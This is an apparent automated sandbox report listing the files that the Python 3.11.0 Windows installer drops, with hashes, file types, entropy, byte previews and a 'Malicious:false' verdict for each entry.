                                                                                                                                SHA-512:1916C135B9BAF513937A142AF56E9A1BDD78E39F57576D8C6B13B45B81C220D6978F9914F369F07CF61BC99D3871A39C76F057E640222D10675A9049D46D774C
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Utility Scripts (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Utility Scripts (64-bit)., Template: x64;1033, Revision Number: {81A3E8C0-53D5-4D2C-8FEE-C8F9AC9D599E}, Create Time/Date: Mon Oct 24 19:43:36 2022, Last Saved Time/Date: Mon Oct 24 19:43:36 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):208896
                                                                                                                                Entropy (8bit):7.411289953349712
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:Nuy/ECeeXsfBW5eHm+BEHQnaMu6avY68ajAu8oilCcIg25x:8raXoaCUDMFavyajAuNil1I
                                                                                                                                MD5:103D7111CB74AE527D0CE32E299B56C0
                                                                                                                                SHA1:9C16486E8BAB76BEC7145B36691162401F33BCCE
                                                                                                                                SHA-256:1D7269A956B1AA9AD19940E2933027A1C0CC5944FEDB1A61E173022ABE9C97BE
                                                                                                                                SHA-512:825812C056E4DA658E25FF12E85808B38DE2806EF1F5F771AD59DAA0399518052C911FD3D99218F42E4D20D47CAFF9B81F1277BC233A147C568FAA5E386FB29A
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Python 3.11.0 Tcl/Tk Support (64-bit), Author: Python Software Foundation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Python 3.11.0 Tcl/Tk Support (64-bit)., Template: x64;1033, Revision Number: {BDEF6F54-8C3E-480E-930F-B96515A4BD13}, Create Time/Date: Mon Oct 24 19:42:46 2022, Last Saved Time/Date: Mon Oct 24 19:42:46 2022, Number of Pages: 500, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.0.5722), Security: 2
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3543040
                                                                                                                                Entropy (8bit):7.9493638862656235
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:98304:lxpiMD0Pf5NxRxuaiXfkrb2DGIlChqQxqf/1R:lj9DEf5NDWfcb2DJQxqf/
                                                                                                                                MD5:21233BA85F3CF185F9D511E30517D185
                                                                                                                                SHA1:AC75AE662358B0D3802DDDCFB950BD2D214A676B
                                                                                                                                SHA-256:E379B1362303C8556890038640D70DC12D17B5723BC17A6B15160A0D96AF4478
                                                                                                                                SHA-512:5863430D646D4F1B181D218173A53C949C79BF63F1A66DFB67E162D4065F36112AA513E58F1BA01658F785197A5460C64D24CBA8F8C9B2FFA9EF11DB5DC8E54D
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):252391
                                                                                                                                Entropy (8bit):5.680181634236121
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:k0KH9/gJe68AeyW33g4rXPDuK/uz/ShNzAPljuy7g86gO22Pt:5C933gcruKU/MKPlqSg8+pPt
                                                                                                                                MD5:846C1DD2C6C529847622632869AFB7AE
                                                                                                                                SHA1:D912ACD6563D2B97BBA5E7BAB55D7F96A1CCDD8B
                                                                                                                                SHA-256:1A307BB667E63E436489C006B0500BE5FB2797C8DADDB02D3C8F6B5A018E4143
                                                                                                                                SHA-512:E4AE7F762BA75779AA4BD25BFA1B3548A3DB645C17904A7DA8C21786A075A29D86122420B4E3873F5D19B9324A9E5EADF395D45442AEE858AD6E700263BF6390
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@E.NY.@.....@.....@.....@.....@.....@......&.{CB7E1801-9FB8-4763-A369-1D7F290AB24D}'.Python 3.11.0 Standard Library (64-bit)..lib.msi.@.....@.....@.....@........&.{8EB245CF-F1C9-4244-B9FB-C59D3B1249D7}.....@.....@.....@.....@.......@.....@.....@.......@....'.Python 3.11.0 Standard Library (64-bit)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@O....@.....@.]....&.{705CA523-2FBB-580C-A749-73C3E8597638}%.C:\Program Files\Python311\Lib\abc.py.@.......@.....@.....@......&.{586E976E-94A2-53B0-8C68-66419B680D9D}&.C:\Program Files\Python311\Lib\aifc.py.@.......@.....@.....@......&.{9BA60165-7D7E-526A-B77E-3BB0B7B6AE68}-.C:\Program Files\Python311\Lib\antigravity.py.@.......@.....@.....@......&.{84ECE070-D24A-587C-AFE0-EC145B94A1B9}*.C:\Program Files\Python311\Lib\argparse.py.@.......@.....@.....@......&.{E72A46D6-78D4-5ABF-82C5-FCCBBD7D44B4}%.C:\Program Files\
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):188019
                                                                                                                                Entropy (8bit):5.80163805211562
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:Jr1EF4n2L0Qs0xHwFKhTL6f+MmNIPfkVVfNCYNC0:JpEw2YQYy+fsFNCYNC0
                                                                                                                                MD5:70572B9070F4390305BC7838C50A06CC
                                                                                                                                SHA1:5ACEF9BAC07B1596C412C4F669BFF37929C6F6ED
                                                                                                                                SHA-256:254198F7F64A754ED1DB475CE8A9ECD746A26850921604A73766D731E63628C6
                                                                                                                                SHA-512:F6DCFE4EECB0BA4D9949C7D0AF6FB9772FEAE90B3F333581F9C8ADD1B26B63F7F4EA4093CE75C4F0502B0F41BA3017AE61333F26903BB1B3BD901F7058BF1549
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@O.NY.@.....@.....@.....@.....@.....@......&.{D3773C88-43C6-46CD-AE5F-627FF6C6E5D4}$.Python 3.11.0 Documentation (64-bit)..doc.msi.@.....@.....@.....@........&.{44288BEF-ED6A-4B77-ACD7-9FF4C8E9415D}.....@.....@.....@.....@.......@.....@.....@.......@....$.Python 3.11.0 Documentation (64-bit)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@<....@.....@.]....&.{4DBE0403-C187-507E-8AE0-31C341A206F2}C.22:\Software\Python\PythonCore\3.11\Help\Main Python Documentation\.@.......@.....@.....@......&.{22FD42DB-EC66-4B1C-B1FC-44E0CF7B2462}..C:\Program Files\Python311\Doc\.@.......@.....@.....@......&.{96BBB626-B14F-5CCA-A0F9-E7A43590C0AC}B.22:\Software\Python\PythonCore\3.11\InstalledFeatures\doc_shortcut.@.......@.....@.....@......&.{A10C7424-91A9-5478-9B75-913AECD85426}..C:\Program Files\Python311\Doc\html\.buildinfo.@.......@.....@.....@......&.{DD86FEDC-E63B-
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):690
                                                                                                                                Entropy (8bit):5.407563852675821
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:Eggb0LBShDcYF5qfcUl/ZF5GfNEhHmX/qHXZNDUSEMszVltNnDRhDcgWYChFhDcy:i0LBYDpF5qtPF5FQXkXZIMEVlt1DTDLw
                                                                                                                                MD5:640987428003F21C0FE45B4458894181
                                                                                                                                SHA1:E577899DCC95A6E247F30FDFF6437D2D933EB293
                                                                                                                                SHA-256:95DD9B966084AD0D47ADD0BACE89D5563F1A8A62ECFE4AE2577DFE230FC96D6A
                                                                                                                                SHA-512:C0C98F2689CF62F5A71F43CBDB960BCA69A2273FBEF8947C2B5840F99D5F168224189B1FEBB0B194FD47481CD545FFCA1EF3F3DCDACC8B6D853620F75BB565FB
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@a.NY.@.....@.....@.....@.....@.....@......&.{CB7E1801-9FB8-4763-A369-1D7F290AB24D}'.Python 3.11.0 Standard Library (64-bit)..lib.msi.@.....@.....@.....@........&.{8EB245CF-F1C9-4244-B9FB-C59D3B1249D7}.....@.....@.....@.....@.......@.....@.....@.......@....'.Python 3.11.0 Standard Library (64-bit)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........RegisterProduct..Registering product..[1]i...0......PublishProduct..Publishing product information.......@.....@.....@......&.{CB7E1801-9FB8-4763-A369-1D7F290AB24D}O.C:\ProgramData\Package Cache\{CB7E1801-9FB8-4763-A369-1D7F290AB24D}v3.11.150.0\...@.....@.....@....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):690
                                                                                                                                Entropy (8bit):5.393948226655214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:Eggb0LBIbFbUFUpkKFl/xRmF2fNEhHmX/qHXZNDUSEMszVltNnxbF/TWYC7LbF2M:i0LBIZUFekKFvUFVQXkXZIMEVlt1xZl2
                                                                                                                                MD5:CCDB0B61CC25BAF0F7C8A463A6E0BE92
                                                                                                                                SHA1:72EB3515339CAFD4B50259A53CDAB0C809866948
                                                                                                                                SHA-256:80C0C0F8F3EEF78EA48F9097B7A07E9F85A3DD3E4756D47F0A44FF619C35FCA6
                                                                                                                                SHA-512:6335B899DF7758E279C2AF1DB4A35A80389168016F0AF0A074DCCDA16E03C77E2FB1CEA27B16B0E9E0000022256EFA06995789C24B8B46B19680D2D9BE5187AA
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@a.NY.@.....@.....@.....@.....@.....@......&.{BD29D023-6B95-47FE-B480-598840EB9A28}&.Python 3.11.0 Utility Scripts (64-bit)..tools.msi.@.....@.....@.....@........&.{81A3E8C0-53D5-4D2C-8FEE-C8F9AC9D599E}.....@.....@.....@.....@.......@.....@.....@.......@....&.Python 3.11.0 Utility Scripts (64-bit)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........RegisterProduct..Registering product..[1]i...0......PublishProduct..Publishing product information.......@.....@.....@......&.{BD29D023-6B95-47FE-B480-598840EB9A28}O.C:\ProgramData\Package Cache\{BD29D023-6B95-47FE-B480-598840EB9A28}v3.11.150.0\...@.....@.....@....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):502382
                                                                                                                                Entropy (8bit):6.133450255986932
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:znH/B9Hd5DyXoaRR5ZlQV8RwcHsJcp5lBZv4RT9n0duBd:znH/DdZyXoaRRdY6sJcp5lBd4Xn0duBd
                                                                                                                                MD5:6AD8823E856D4D2517CA1084DA82706C
                                                                                                                                SHA1:3DD22F8AF6B71057996F26AA2D23484D8D6D7D70
                                                                                                                                SHA-256:19F8570669FD1C2E4ECA794068D98AA1FE364A219F8CB4FD1739288B72CF770E
                                                                                                                                SHA-512:1090C54C3C6FE0C356E98C03CB0852765FBA7AE174B529D8388642D31EA27C213832392388B1B1F01CF01566DE836C7D70BF6AF72E7B6EDA81B4916ABFB548D2
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@b.NY.@.....@.....@.....@.....@.....@......&.{6FBFD1F4-0412-4DBB-AA00-F71278CAB664}%.Python 3.11.0 Tcl/Tk Support (64-bit)..tcltk.msi.@.....@.....@.....@........&.{BDEF6F54-8C3E-480E-930F-B96515A4BD13}.....@.....@.....@.....@.......@.....@.....@.......@....%.Python 3.11.0 Tcl/Tk Support (64-bit)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{097F3595-F2E1-560D-A237-0E6B6A5B11D4}).22:\Software\Python\PythonCore\3.11\Idle\.@.......@.....@.....@......&.{30CC6839-C7A2-5400-ADCA-2F4F56CCD535}2.22:\Software\Python\PythonCore\3.11\IdleShortcuts\.@.......@.....@.....@......&.{FB62874F-B886-51BD-8AB1-53DC394DDAB0},.C:\Program Files\Python311\DLLs\_tkinter.pyd.@.......@.....@.....@......&.{2943FE57-2421-5809-9FE9-26604F67730C},.C:\Program Files\Python311\libs\_tkinter.lib.@.......@.....@.....@......&.{A8B945D9-83B5-52BF-A8E4-C1BE42FEE535}*.C:
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.1613000003220666
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:JSbX72FjdSAGiLIlHVRpqh/7777777777777777777777777vDHF3Hz7KOpZl0i5:JqQI56VHz7KjF
                                                                                                                                MD5:8022A904D6F1169AF96B96DFB32D37D9
                                                                                                                                SHA1:808656C2BFE3127CE1F31778914F0E145D0D2731
                                                                                                                                SHA-256:A271F2C95793BD0D3A9E06589D848D818E7FE2EB29C3A3222583152DE3F06E07
                                                                                                                                SHA-512:7B121D682C0EB364C7EDD428AED797C959D135E5661101ED8B21D0F2FB2137ECEC040D51482BC08BC73372AD107502905439AAC9D23ABA1882A049FBA4329DF4
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.1619102079168946
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:JSbX72FjhAGiLIlHVRpMh/7777777777777777777777777vDHFcw95zhp3Xl0i5:JfQI5c6w9R6F
                                                                                                                                MD5:C475F4221EE7E78E258A20462FA7BD04
                                                                                                                                SHA1:74B4FB3881F9C20D448FD3436838D0FD981DF10B
                                                                                                                                SHA-256:D3440816D9C6B71A6C6CCBB982D4814335C64706DCF93BE6C16F74BD61896C4A
                                                                                                                                SHA-512:DD5D34431912716B6764443F8D86BDC744B6B17FC75AB020CE7C1FCBA3412E15385A49AB04FEB4969DBFCA0AEE147A7354042828BCBDF64B074F3F15E6C6A8D4
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):1.1607045501679956
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:JSbX72FjmAGiLIlHVRpqh/7777777777777777777777777vDHF2oWZ/pZl0i8Q:J0QI56EoJF
                                                                                                                                MD5:2984A9D0279AA62229C40754A653E39E
                                                                                                                                SHA1:5DFF4A53C36450D9C57E5C577B27DEA502F046D9
                                                                                                                                SHA-256:ECA22C0BA4D3E6750C935E5FCB196E593679F1329A94530A8313E2488C5087DB
                                                                                                                                SHA-512:7AF794D7E556CD566A20C2D1612ABDE89C16FADA1FAB53BF64B08C31ADF434E187BA5FC8490D89D60FE28E2C6811107B5119CDD0C209C2FF2CDBA59ABFF44F10
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:JSON data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):55
                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                Malicious:false
                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (675), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):101308
                                                                                                                                Entropy (8bit):3.7248729769473004
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:XzPIgTPT/s2iA9JI4kzlgfTlQCQZ01s56H7OCGVfXzRz2mUF7J7PG2km/MqIAcdF:XzPIrlklBY5
                                                                                                                                MD5:37D5E3E690BF0E58DB9873516812599D
                                                                                                                                SHA1:9E6D1E4CD46EEFCD2B585EB1A450231817D251F9
                                                                                                                                SHA-256:4C694653B483F1024371A058EFF0022F9E850ABCB3771F9083BF002C48A7506D
                                                                                                                                SHA-512:3418D3A63874169527453D405CF5559382036FCB5C67A67D2473F20BD99CD706537F00AD7932E026CA8D21999AB6A7153D2C6567BDB4653A35682D93F3070949
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".P.y.t.h.o.n. .3...1.1...0. .(.6.4.-.b.i.t.).". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.7.f.8.3.8.1.a.d.-.2.e.4.2.-.4.4.3.2.-.8.d.e.5.-.c.7.b.e.e.b.e.1.0.0.9.f.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.7.6.7.B.3.1.E.B.-.0.1.0.6.-.5.A.E.3.-.B.4.6.E.-.7.7.F.3.2.D.1.B.A.B.A.2.}.". .P.e.r.M.a.c.h.i.n.e.=.".n.o.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.F.e.a.t.u.r.e.I.n.f.o. .P.a.c.k.a.g.e.=.".e.x.e._.A.l.l.U.s.e.r.s.". .F.e.a.t.u.r.e.=.".D.e.f.a.u.l.t.F.e.a.t.u.r.e.". .S.i.z.e.=.".2.0.4.9.0.2.6.". .P.a.r.e.n.t.=.".". .T.i.t.l.e.=.".P.y.t.h.o.n. .3...1.1...0. .E.x.e.c.u.t.a.b.l.e.
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12050
                                                                                                                                Entropy (8bit):5.202199468357687
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0cUc9Oa2cacjcPnfEUcUr80Mpcu5cmc0pc3:0cUcAa2cacjcPfFcUx4cu5cmcQc3
                                                                                                                                MD5:4A006BB0FD949404E628D26F833C994B
                                                                                                                                SHA1:128BF94B6232C1591EE9D9D4B15953368838D8EF
                                                                                                                                SHA-256:BE2BAED45BCFB013E914E9D5BF6BC7C77A311F6F1723AFBB7EB1FAA7DA497E1B
                                                                                                                                SHA-512:B77383479E630060AEAACBB59E4F90AA0DB3037C9C37EBF668CF6669F48B9F57602210C8E0C20B92A20D1BAE1A371A98997B35F48082456F77964C7978664CD4
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="670" Height="412" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-14" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="1" Height="-26" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="2" Height="-24" Weight="500" Foreground="808080" Background="ffffff">Segoe UI</Font>.. <Font Id="3" Height="-14" Weight="500" Foreground="000000" Background="ffffff">Segoe UI</Font>.. <Font Id="4" Height="-14" Weight="500" Foreground="ff0000" Background="ffffff" Underline="yes">Segoe UI</Font>.. <Font Id="5" Height="-14" Weight="500" Foreground="808080" Background="ffffff">Segoe UI</Font>.... <Page Name="Help">.. <Text X="185" Y="11" Width="-11" Height="36" FontId="1" DisablePrefix="yes">#(loc.HelpHeader)</Text>.. <Image X="0" Y="0" Width="178" Height="382" Ima
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (349), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9157
                                                                                                                                Entropy (8bit):5.08118087878034
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:JTqB3tcIyDykuiM7iIbY8gQOOeupqplqe7o7qiYici+iDF8zcz6/DuukOVZbRU8q:k5J+nSuUBBr+N/K
                                                                                                                                MD5:3599F10F43292724DCBFF9064172DA70
                                                                                                                                SHA1:B6E041707A22B8DE41B1E100A3DD94900D023BAA
                                                                                                                                SHA-256:24445135B97FCF8CEC3DD1CC96DD0965627EC2C214F2AF67D6E1344F791CD774
                                                                                                                                SHA-512:26A9A1F58C6F613EFD88A8178D2A059BF0EE1B67EFDEB8978DCA0100F98103A73BCE9724E0DABA718C921BCE5A56E5179133067C5EA6149442F6CF2D14CAA3C6
                                                                                                                                Malicious:false
                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<WixLocalization Culture="en-us" Language="1033" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Installing">Installing</String>.. <String Id="Installation">Setup</String>.. <String Id="Modifying">Updating</String>.. <String Id="Modification">Modify</String>.. <String Id="Repairing">Repairing</String>.. <String Id="Repair">Repair</String>.. <String Id="Uninstalling">Removing</String>.. <String Id="Uninstallation">Uninstall</String>.. .. <String Id="ElevateForCRTInstall">You will be prompted for Administrator privileges to install a C Runtime Library update (KB2999226).......Continue?</String>.. .. <String Id="CancelButton">&amp;Cancel</String>.. <String Id="CloseButton">&amp;Close</String>.. <String Id="InstallHeader">Install [WixBundleName]</String>.. <String Id="InstallMessage">Select Install Now to install Python with default settings, or choose
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):687616
                                                                                                                                Entropy (8bit):5.996424966093035
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:E4vBxEOzrbCgUtcfItqnuzOL48h1d5G1duqIYcUuaez4RkXWrp:PBxlrmcwtquX/duqIwdqmrp
                                                                                                                                MD5:5D8FA952950469A8904E4F68AC193699
                                                                                                                                SHA1:CE9F68FB9601B9A5B95FC93C88A3A22ED42AFA3D
                                                                                                                                SHA-256:CA7527124A97079C229332867BD27FEDE3EB263A52639B4BDAF39ED47E604E57
                                                                                                                                SHA-512:58C43A813FF9F5BEBE2928E68B7F28F999922248CCC6E8CF6CE5F14BAF6AA42B9B8E59FE9B638C5376E7E4E86FE21EAE185FD51328B7B000BBE6903794E161B4
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........<...R...R...R...Q...R...W.P.R.[.V...R.[.Q...R.[.W...R...V...R...T...R.~.W...R...S...R...S.$.R.U.W...R.U.R...R.U.....R.U.P...R.Rich..R.........................PE..L.....Vc...........!...!.d..........,C....................................................@.........................0........V..........<........................7..`...8...........................x...@............P...............................text....c.......d.................. ..`.rdata..G............h..............@..@.data...x*... ......................@....idata..:$...P...&..................@..@.00cfg...............4..............@..@.rsrc...<............6..............@..@.reloc..t@.......B...<..............@..B........................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                File Type:PNG image data, 176 x 382, 8-bit/color RGB, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51948
                                                                                                                                Entropy (8bit):7.980841800703768
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:/c/aRsg1fYfJt0Bg74nWPMMCNBaeQzxxj8ckBo:UcsgGfP0yCWTAaeyxxjGBo
                                                                                                                                MD5:888EB713A0095756252058C9727E088A
                                                                                                                                SHA1:C14F69F2BEF6BC3E2162B4DD78E9DF702D94CDB4
                                                                                                                                SHA-256:79434BD1368F47F08ACF6DB66638531D386BF15166D78D9BFEA4DA164C079067
                                                                                                                                SHA-512:7C59F4ADA242B19C2299B6789A65A1F34565FED78730C22C904DB16A9872FE6A07035C6D46A64EE94501FBCD96DE586A8A5303CA22F33DA357D455C014820CA0
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR.......~......@.y....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...........k.....IDATx...Y.e.v...f....YY.k....CC. H..I..E..M....)K.j".......p8...P.!...*dZ.l.![.M.`c..................ZsN.......YY.2.U>......{..s.5.c....g.H..WD....Q.........*......#.(1{..%f..""..Z...=..w...=*.......{...{..].~kN)1...*1..W..W.=...K.".n.{w.....Ad..,D.......1;.....b.011....QNBV#B..#...(.^...._=.B..9..;..~.ZVh....L..L,D.A...A.A.D.=. ...X.Y...U. %V..A...I@.+....DDAD.l..L..D..A.."D.A.L...9.(..#"...@....1.o.V..L.....Af&D8..M.._...AA.ND-.033.Qx.;....[......=.....) ....<.-.cb...,..A.......f<....DP.G.H...EA$.?..G...c....,".A..L..=H.X...3.F.y...G.&.....*...np;.=3S....b..w"bFL.G..[.A......A....M.Q.3.J.e.Pj.."|..fF.I.E^..H.h...|.x.....3...0.P..^.'A;(...P=::Of...../D..PpcF...."'W=........._...g..2..k.. ".].@?..k....c.7#$<..a.../.l.BAn...|....#.....l .VU..]g/..<T..u..N,.A...n.*h.d..A..BF.I.U....AA...(..D.nQ...&z("..Dn.,LT.
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):876424
                                                                                                                                Entropy (8bit):7.379881401918429
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:o5mWpI2jFM5sFzfTpiaGlN5WUG16CU3nMo:o5BjBbTpia25W/7UXMo
                                                                                                                                MD5:7711C60D5DB60B1DFD6660016CF02D6F
                                                                                                                                SHA1:6B38524EE7961E9BD224C75EAD54449C0D77BB12
                                                                                                                                SHA-256:F13FDA5A87D010E15EB167E5DCAEC27121E4427AE9C8C9991DB95ED5FE36DE1B
                                                                                                                                SHA-512:55AAC69297DD5A19D8A78E0E36CE6BE23D940D26AC4831E1DB09C9AA5B43243158B8F2B24DF4A2638B98442C305B0BD1547D8C597C8339E5938E73417820AC37
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........[.s...s...s.......s......$s.......s.......s.......s.......s.......s.......s...s...r.......s....Q..s...s9..s.......s..Rich.s..........................PE..L....RKa..........................................@.......................................@.................................<............e..........86..P)...P...=...{..T....................{.......z..@............................................text.............................. ..`.rdata..t...........................@..@.data...............................@....wixburn8...........................@..@.rsrc....e.......f..................@..@.reloc...=...P...>..................@..B........................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
